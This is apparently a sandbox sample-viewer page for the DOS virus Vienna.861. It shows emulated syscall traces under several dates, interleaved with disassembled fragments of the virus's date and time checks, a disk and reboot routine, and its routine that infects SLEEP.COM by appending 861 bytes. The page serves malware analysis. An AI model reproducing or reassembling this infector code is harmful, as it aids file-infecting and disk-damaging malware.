Sample viewer

vx.netlux.org/Virus.DOS.Vienna.861

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T23:10:29.147194954Z	47	PC: 12a74 \| Get disk transfer address
2018-12-17T23:10:29.150284356Z	26	PC: 12a5a \| Set disk transfer address
2018-12-17T23:10:29.153357367Z	42	PC: 12a81 \| Get date 0x12a81: cmp al, 1 0x12a83: jge 0x12a87 0x12a85: jmp 0x12ad1 0x12a87: cmp al, 1 0x12a89: ja 0x12ad1 0x12a8b: jmp 0x12a8d 0x12a8d: mov dl, 2 0x12a8f: mov ah, 5 0x12a91: mov dh, 0x80 0x12a93: mov ch, 0 0x12a95: int 0x13 0x12a97: mov cx, 0x14 0x12a9a: push cx 0x12a9b: call 0x12aa8 0x12a9e: mov cx, 0x4000 0x12aa1: loop 0x12aa1 0x12aa3: pop cx 0x12aa4: loop 0x12a9a 0x12aa6: jmp 0x12a8d 0x12aa8: mov dx, 0x140

{"DateBased":true,"Day":6,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16868,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:54:08.00704896Z	47	PC: 12a74 \| Get disk transfer address
2018-12-25T12:54:08.008928372Z	26	PC: 12a5a \| Set disk transfer address
2018-12-25T12:54:08.011487859Z	42	PC: 12a81 \| Get date 0x12a81: cmp al, 1 0x12a83: jge 0x12a87 0x12a85: jmp 0x12ad1 0x12a87: cmp al, 1 0x12a89: ja 0x12ad1 0x12a8b: jmp 0x12a8d 0x12a8d: mov dl, 2 0x12a8f: mov ah, 5 0x12a91: mov dh, 0x80 0x12a93: mov ch, 0 0x12a95: int 0x13 0x12a97: mov cx, 0x14 0x12a9a: push cx 0x12a9b: call 0x12aa8 0x12a9e: mov cx, 0x4000 0x12aa1: loop 0x12aa1 0x12aa3: pop cx 0x12aa4: loop 0x12a9a 0x12aa6: jmp 0x12a8d 0x12aa8: mov dx, 0x140
2018-12-25T12:54:08.01487831Z	44	PC: 12ad5 \| Get time 0x12ad5: and dh, 0xf 0x12ad8: cmp dh, 3 0x12adb: jb 0x12a97 0x12add: cmp dh, 3 0x12ae0: ja 0x12b07 0x12ae2: int 0x19 0x12ae4: mov ah, 0x47 0x12ae6: xor dl, dl 0x12ae8: add si, 0 0x12aeb: int 0x21 0x12aed: jb 0x12b07 0x12aef: mov ah, 0x3b 0x12af1: mov dx, si 0x12af3: add dx, 0x40 0x12af6: int 0x21 0x12af8: mov word ptr [bx + 0x44], di 0x12afb: mov si, bx 0x12afd: add si, 0x36 0x12b00: mov cx, 6 0x12b03: rep movsb byte ptr es:[di], byte ptr [si]
2018-12-25T12:54:08.017951183Z	78	PC: 12b80 \| Find first file
2018-12-25T12:54:08.026548738Z	67	PC: 12bbf \| Get or set file attributes
2018-12-25T12:54:08.033743361Z	67	PC: 12bcf \| Get or set file attributes
2018-12-25T12:54:08.053576669Z	61	PC: 12bd9 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:54:08.062196627Z	87	PC: 12be5 \| Get or set file date and time
2018-12-25T12:54:08.064905519Z	44	PC: 12bef \| Get time 0x12bef: and dh, 7 0x12bf2: jmp 0x12bf4 0x12bf4: mov ah, 0x3f 0x12bf6: mov cx, 3 0x12bf9: mov dx, 0x2a 0x12bfc: add dx, si 0x12bfe: int 0x21 0x12c00: jb 0x12c5a 0x12c02: cmp ax, 3 0x12c05: jne 0x12c5a 0x12c07: mov ax, 0x4202 0x12c0a: mov cx, 0 0x12c0d: mov dx, 0 0x12c10: int 0x21 0x12c12: jb 0x12c5a 0x12c14: mov cx, ax 0x12c16: sub ax, 3 0x12c19: mov word ptr [si + 0x2e], ax 0x12c1c: add cx, 0x35d 0x12c20: mov di, si
2018-12-25T12:54:08.067703164Z	63	PC: 12c00 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:54:08.076576409Z	66	PC: 12c12 \| Move file pointer
2018-12-25T12:54:08.078267315Z	64	PC: 12c3a \| Write file or device (Write 861 bytes on handle 5)
2018-12-25T12:54:08.08771166Z	66	PC: 12c4c \| Move file pointer
2018-12-25T12:54:08.090385751Z	64	PC: 12c5a \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:54:08.099173227Z	87	PC: 12c6b \| Get or set file date and time
2018-12-25T12:54:08.101488553Z	62	PC: 12c6f \| Close file
2018-12-25T12:54:08.110475067Z	67	PC: 12c7c \| Get or set file attributes
2018-12-25T12:54:08.122762658Z	26	PC: 12c87 \| Set disk transfer address

{"DateBased":true,"Day":7,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16868,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:54:08.039896176Z	47	PC: 12a74 \| Get disk transfer address
2018-12-25T12:54:08.041868697Z	26	PC: 12a5a \| Set disk transfer address
2018-12-25T12:54:08.04351821Z	42	PC: 12a81 \| Get date 0x12a81: cmp al, 1 0x12a83: jge 0x12a87 0x12a85: jmp 0x12ad1 0x12a87: cmp al, 1 0x12a89: ja 0x12ad1 0x12a8b: jmp 0x12a8d 0x12a8d: mov dl, 2 0x12a8f: mov ah, 5 0x12a91: mov dh, 0x80 0x12a93: mov ch, 0 0x12a95: int 0x13 0x12a97: mov cx, 0x14 0x12a9a: push cx 0x12a9b: call 0x12aa8 0x12a9e: mov cx, 0x4000 0x12aa1: loop 0x12aa1 0x12aa3: pop cx 0x12aa4: loop 0x12a9a 0x12aa6: jmp 0x12a8d 0x12aa8: mov dx, 0x140

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16868,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:54:08.04132788Z	47	PC: 12a74 \| Get disk transfer address
2018-12-25T12:54:08.042741992Z	26	PC: 12a5a \| Set disk transfer address
2018-12-25T12:54:08.043711001Z	42	PC: 12a81 \| Get date 0x12a81: cmp al, 1 0x12a83: jge 0x12a87 0x12a85: jmp 0x12ad1 0x12a87: cmp al, 1 0x12a89: ja 0x12ad1 0x12a8b: jmp 0x12a8d 0x12a8d: mov dl, 2 0x12a8f: mov ah, 5 0x12a91: mov dh, 0x80 0x12a93: mov ch, 0 0x12a95: int 0x13 0x12a97: mov cx, 0x14 0x12a9a: push cx 0x12a9b: call 0x12aa8 0x12a9e: mov cx, 0x4000 0x12aa1: loop 0x12aa1 0x12aa3: pop cx 0x12aa4: loop 0x12a9a 0x12aa6: jmp 0x12a8d 0x12aa8: mov dx, 0x140
2018-12-25T12:54:08.045719254Z	44	PC: 12ad5 \| Get time 0x12ad5: and dh, 0xf 0x12ad8: cmp dh, 3 0x12adb: jb 0x12a97 0x12add: cmp dh, 3 0x12ae0: ja 0x12b07 0x12ae2: int 0x19 0x12ae4: mov ah, 0x47 0x12ae6: xor dl, dl 0x12ae8: add si, 0 0x12aeb: int 0x21 0x12aed: jb 0x12b07 0x12aef: mov ah, 0x3b 0x12af1: mov dx, si 0x12af3: add dx, 0x40 0x12af6: int 0x21 0x12af8: mov word ptr [bx + 0x44], di 0x12afb: mov si, bx 0x12afd: add si, 0x36 0x12b00: mov cx, 6 0x12b03: rep movsb byte ptr es:[di], byte ptr [si]
2018-12-25T12:54:08.048778996Z	78	PC: 12b80 \| Find first file
2018-12-25T12:54:08.054612441Z	67	PC: 12bbf \| Get or set file attributes
2018-12-25T12:54:08.05994755Z	67	PC: 12bcf \| Get or set file attributes
2018-12-25T12:54:08.086204294Z	61	PC: 12bd9 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:54:08.097549359Z	87	PC: 12be5 \| Get or set file date and time
2018-12-25T12:54:08.099057762Z	44	PC: 12bef \| Get time 0x12bef: and dh, 7 0x12bf2: jmp 0x12bf4 0x12bf4: mov ah, 0x3f 0x12bf6: mov cx, 3 0x12bf9: mov dx, 0x2a 0x12bfc: add dx, si 0x12bfe: int 0x21 0x12c00: jb 0x12c5a 0x12c02: cmp ax, 3 0x12c05: jne 0x12c5a 0x12c07: mov ax, 0x4202 0x12c0a: mov cx, 0 0x12c0d: mov dx, 0 0x12c10: int 0x21 0x12c12: jb 0x12c5a 0x12c14: mov cx, ax 0x12c16: sub ax, 3 0x12c19: mov word ptr [si + 0x2e], ax 0x12c1c: add cx, 0x35d 0x12c20: mov di, si
2018-12-25T12:54:08.101379875Z	63	PC: 12c00 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:54:08.107791043Z	66	PC: 12c12 \| Move file pointer
2018-12-25T12:54:08.108974181Z	64	PC: 12c3a \| Write file or device (Write 861 bytes on handle 5)
2018-12-25T12:54:08.116948666Z	66	PC: 12c4c \| Move file pointer
2018-12-25T12:54:08.118967135Z	64	PC: 12c5a \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:54:08.125648552Z	87	PC: 12c6b \| Get or set file date and time
2018-12-25T12:54:08.127524828Z	62	PC: 12c6f \| Close file
2018-12-25T12:54:08.135208785Z	67	PC: 12c7c \| Get or set file attributes
2018-12-25T12:54:08.144558185Z	26	PC: 12c87 \| Set disk transfer address